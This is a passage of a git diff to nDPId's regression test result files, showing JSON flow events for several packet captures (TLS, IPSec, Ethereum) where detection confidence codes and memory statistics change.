YUuTKEqAk5KVlL4AHAACQAE="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7580000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879675 bytes -~~ total memory freed........: 5879675 bytes -~~ total allocations/frees...: 118137/118137 +~~ total memory allocated....: 6013309 bytes +~~ total memory freed........: 6013309 bytes +~~ total allocations/frees...: 120899/120899 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 1431 chars diff --git a/test/results/esp.pcapng.out b/test/results/esp.pcapng.out index a910685a6..a385fce4d 100644 --- a/test/results/esp.pcapng.out +++ b/test/results/esp.pcapng.out @@ -2,15 +2,15 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"esp.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1587340723655} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340723655,"flow_last_seen":1587340723655,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587340723655,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00918{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1587340723655,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1587340723655,"pkt":"qrvMAAMQqrvMAAIQCABFwAGCAN8AAP8RncEKAgMCCgMEBAH0AfQBbm9jBawPTRIgE\/QAAAAAAAAAACEgIggAAAAAAAABZiIAADAAAAAsAQEABAMAAAwBAAAMgA4BAAMAAAgCAAAGAwAACAMAAA0AAAAIBAAAFCgAAGgAFAAADDsDka\/duvsZYQytelWlC6NzARHfxQ9jT\/JU2Un7NCQA+jXJ08WlF7e\/NDuPTB526R8Cb4Zuk\/QhNNiyysAyBZ0W7cfOpAFmMETkjg2lvpSaO0W743zdwZbhwL5xtEDwKwAAJBinv2eNdHZsJ29wVvPTnOU5tMnnhBtj26lK3VUpGlaPKwAAF0NJU0NPLURFTEVURS1SRUFTT04rAAATQ0lTQ09WUE4tUkVWLTAyKwAAF0NJU0NPLURZTkFNSUMtUk9VVEUpAAAVRkxFWFZQTi1TVVBQT1JURUQpAAAcAABABE++qlf\/rnDMCHdomXQhhbbCu7VdAAAAHAAAQAWxbxU4srTSjW8apuj3nZ6SyjPUCQ=="} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340723655,"flow_last_seen":1587340723655,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587340723655,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340723655,"flow_last_seen":1587340723655,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587340723655,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00915{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1587340723662,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1587340723662,"pkt":"qrvMAAIQqrvMAAMQCABFwAGCALsAAP4RnuUKAwQECgIDAgH0AfQBbq1OBawPTRIgE\/RfRu5wvExdDSEgIiAAAAAAAAABZiIAADAAAAAsAQEABAMAAAwBAAAMgA4BAAMAAAgCAAAGAwAACAMAAA0AAAAIBAAAFCgAAGgAFAAAeXKfqwaHkiVcMu+s4hPX5cnikVUBSUWhEvjp8uoOs40Tz5cGWTSvQJV6y1mRBbxFiQyb2IMgnjb1iZi0xKtA\/z0+EIGKekMJYxfmbb\/4xwAcTsSdkiXWBGpDjFPvtwoFKwAAJFV3ojUiOZ96AboWM1NGpIwiUnFn+cWbLdwgiG0miL+8KwAAF0NJU0NPLURFTEVURS1SRUFTT04rAAATQ0lTQ09WUE4tUkVWLTAyKwAAF0NJU0NPLURZTkFNSUMtUk9VVEUpAAAVRkxFWFZQTi1TVVBQT1JURUQpAAAcAABABM9z9pZZgKD+9ZzdamlEsYrKkUeFAAAAHAAAQAW1v1HiklqGfJbwATvaTOUm2F82pg=="} 00903{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1587340723670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1587340723670,"pkt":"qrvMAAMQqrvMAAIQCABFwAF0AOAAAP8Rnc4KAgMCCgMEBAH0AfQBYJxOBawPTRIgE\/RfRu5wvExdDS4gIwgAAAABAAABWCsAATwo9kmU8gXj0EedKmJNK+VWGrNk6m7d+9Hkki0QPpJ2UQ5K8xYpTzRz1oZI364ZkaSAYAohIEiUwnprO5bmbmb9qIM0+fTiZw1DojFlouyNg03a\/0kz6o8jRJv4PqCaYhITIh\/4NKPCOB9tcYohRiSgu\/5zHv5JvWQ3XksC8IcgVNMiE\/5aFElRFljlmMpjAGXZkK5XnvWJkamx2rhcvcJAij70Uj\/oD\/j\/w0o\/c6VbgHLqoRwpcPmMvxRAwmOQ9oz2xcYWrhIQBi3xWUKWjmz+pxNn90bdNL3SDkdsODmIIBQap7G54zol1jJWQerYPntwLshRMgA0rGIBYYU+04lQqf81IAAxPlDlMj5Hwsr6MJ2wlEyY2dKouxpx9+iHwUGg8fELtW5lR77T\/2mt7GtUUmU2DqAv\/QQ="} 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340725658,"flow_last_seen":1587340725658,"flow_idle_time":620000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1587340725658,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":50,"flow_datalink":1,"flow_max_packets":3} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1587340725658,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1587340725658,"pkt":"qrvMAAMQqrvMAAIQCABFAACYACQAAP8yoAUKAgMCCgMEBCNgsOMAAAABectfgWUl04YUbzWcC+4xd1UOV3SUluMVSc1O+uGKzjlWG3KV9r0S61l07FAMCtvDlpgFzU5YdVATZgur7sMbrkC7o3l\/upPdN3M20ENHGJg7SyVgEI8QrdTAVpl1VXAu7t+SCLVFZwaCQYUWnFFZvKSDZFqF6SACpTMBZA=="} -00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340725658,"flow_last_seen":1587340725658,"flow_idle_time":620000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1587340725658,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":50,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587340725658,"flow_last_seen":1587340725658,"flow_idle_time":620000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1587340725658,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":50,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1587340725659,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1587340725659,"pkt":"qrvMAAIQqrvMAAMQCABFAACYACQAAP4yoQUKAwQECgIDAvAJLLUAAAABLX+WjVQswRpYbFeiaZdQW6eWJsw6BS2eB7OP9\/5eHwi2mYpUZ6G3t755XGwuYLanMk25K6hMBwBSxcZ\/ydNZPrrxBrySAlcBAFV4v6tDTuHpnnv89BSOnoK6gF0SG3nSCAMIxyxKQV4U+ecInNO5d\/EnrgCW7OWI7NuXZg=="} -00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1587340723655,"flow_last_seen":1587340723676,"flow_idle_time":200000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":1356,"flow_avg_l4_payload_len":339,"midstream":0,"thread_ts_msec":1587340725659,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587340725658,"flow_last_seen":1587340725659,"flow_idle_time":620000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1587340725659,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":50,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1587340723655,"flow_last_seen":1587340723676,"flow_idle_time":200000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":1356,"flow_avg_l4_payload_len":339,"midstream":0,"thread_ts_msec":1587340725659,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587340725658,"flow_last_seen":1587340725659,"flow_idle_time":620000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1587340725659,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":50,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"esp.pcapng","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":1620,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1587340725659} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -20,9 +20,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870677 bytes -~~ total memory freed........: 5870677 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6004311 bytes +~~ total memory freed........: 6004311 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 923 chars diff --git a/test/results/ethereum.pcap.out b/test/results/ethereum.pcap.out index a80879c6a..dc69c56f3 100644 --- a/test/results/ethereum.pcap.out +++ b/test/results/ethereum.pcap.out @@ -2,29 +2,29 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1578508362274} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508362274,"flow_last_seen":1578508362274,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508362274,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1578508362274,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508362274,"pkt":"KDc3AG3IEBMx8Tl2CABFAACc0mBAADURe2hXDt4ZwKgBuN11dl8AiEJtHMys6Q29AOp21rwpZSDXERjTbIzhwNph0idC5kCkV\/FDnhOUP\/GMZC9pQ1ikY4tKfgVohRJdDV\/jhdY3JkNQ8nfjTjeSnG7Ixlzbx1L2txMkADCUTD6WfRXFuzz03\/IfAAHdBMuEfwAAAYJ2X4J2X8mETxbOvYLp94CEXhYgXgU="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508362274,"flow_last_seen":1578508362274,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508362274,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508362274,"flow_last_seen":1578508362274,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508362274,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1578508363333,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508363333,"pkt":"KDc3AG3IEBMx8Tl2CABFAADH0wVAADURephXDt4ZwKgBuN11dl8As\/l1jW6o\/uOLsNilE7wPPGgWLrGBgPfvOzwO1DfZyAOcgKFZ114jjOcqSahrn1BNVaBcqPiZ+5Zw3KmlNNeK6areM2YGHfDo3L4DI03KcwYwznBps1b+iFJS+0Kipikc3Gq9AQP4R7hAl090ZgbQhHWBj8BMRwa4LeNB32fKxPZW6UW3BwzH4FX8L40Uh5Yh\/LpdLpgFyY0tX7A7rx7OhPCc704eHlKGuoReFiBf"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508363692,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1578508363692,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1578508363692,"pkt":"KDc3AG3IEBMx8Tl2CABFAACdOfxAACwR9O08vyBHwKgBuHZfdl8AicNGfxf10Wb92tmu8P4AYDHc1S9CYBd0hA8u+7bp2exSZpfjoD4stw3HK2zECpnkODZdOg6LxGWvabU8eolUhCpRWxf283jKbdR45yXwcXrtjWJbPi2JRR9Nts4CTYECrpr\/AQHeBcuErBIAAoJ2X4J2X8uETxbOvYLp94J2X4ReFiBe"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508363692,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508363692,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508364272,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1578508364272,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":1578508364272,"pkt":"KDc3AG3IEBMx8Tl2CABFCACn7eVAACURF08DcIo5wKgBuGOsdl8Ak1lonaJ3QYcb7U0uMgLRKCkYOOmsVBzd6scD1gTgbTNauX3kB3bPaDZ67w0\/6JScqj4YBzeDQtx9d9GUfbwpNwws+A3fj9N5t1f25M57T8Etpo9cRpw0Ipg9vE7GnadXMLBRAAHoBNeQAAAAAAAAAAAAAAAAAAAAAIInD4InD8mETxbOvYLp94CEXhYgYA=="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508364272,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1578508364272,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 